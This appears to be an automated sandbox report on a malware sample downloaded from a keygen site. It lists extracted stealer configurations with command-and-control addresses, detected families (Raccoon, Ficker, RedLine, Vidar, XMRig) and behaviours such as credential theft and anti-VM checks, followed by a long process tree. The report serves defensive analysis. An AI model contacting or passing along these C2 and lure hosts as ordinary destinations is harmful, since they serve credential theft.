Resubmissions
22-04-2021 16:45
210422-k9xv9nxcbx 1021-04-2021 17:01
210421-pl1rqeqs7n 1021-04-2021 12:53
210421-gkr26l4mvs 1020-04-2021 19:55
210420-nex8ep6zhj 1020-04-2021 15:03
210420-v63pp18knj 10Analysis
-
max time kernel
1036s -
max time network
1798s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
20-04-2021 19:55
General
-
Target
https://keygenit.com/d/8550ceeb125094q2480.html
-
Sample
210420-nex8ep6zhj
Score
10/10
Malware Config
Extracted
Family
raccoon
Botnet
562d987fd49ccf22372ac71a85515b4d288facd7
Attributes
-
url4cnc
https://telete.in/j90dadarobin
rc4.plain
rc4.plain
Extracted
Family
fickerstealer
C2
sodaandcoke.top:80
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
fickerstealer
Ficker is an infostealer written in Rust and ASM.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
XMRig Miner Payload 1 IoCs
-
Blocklisted process makes network request 7 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 64 IoCs
-
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 64 IoCs
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
-
Checks for any installed AV software in registry 1 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Drops Chrome extension 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
-
Suspicious use of SetThreadContext 32 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 6 IoCs
-
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 8 IoCs
-
Kills process with taskkill 13 IoCs
-
Modifies Internet Explorer settings 1 TTPs 8 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Runs ping.exe 1 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: LoadsDriver 3 IoCs
-
Suspicious behavior: MapViewOfSection 53 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 25 IoCs
-
Suspicious use of SendNotifyMessage 52 IoCs
-
Suspicious use of SetWindowsHookEx 35 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/8550ceeb125094q2480.html1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0x8,0xd4,0x7ff88dbc4f50,0x7ff88dbc4f60,0x7ff88dbc4f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1576 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1624 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1940 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2792 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4880 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3552 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5960 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5892 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5956 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6204 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6212 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6360 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6092 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6892 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4956 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings2⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x240,0x244,0x248,0x23c,0x218,0x7ff76f17a890,0x7ff76f17a8a0,0x7ff76f17a8b03⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6748 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6708 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6596 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6176 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6148 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6000 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6116 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6300 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6780 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6820 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6480 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4932 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6828 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6864 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6264 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3656 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6316 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3888 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4248 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6304 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4188 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5056 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6548 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3660 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6140 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3524 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3696 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3864 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4236 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2956 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4308 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8004 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7960 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5816 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1352 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2988 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3648 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7760 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4240 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7736 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3964 /prefetch:82⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
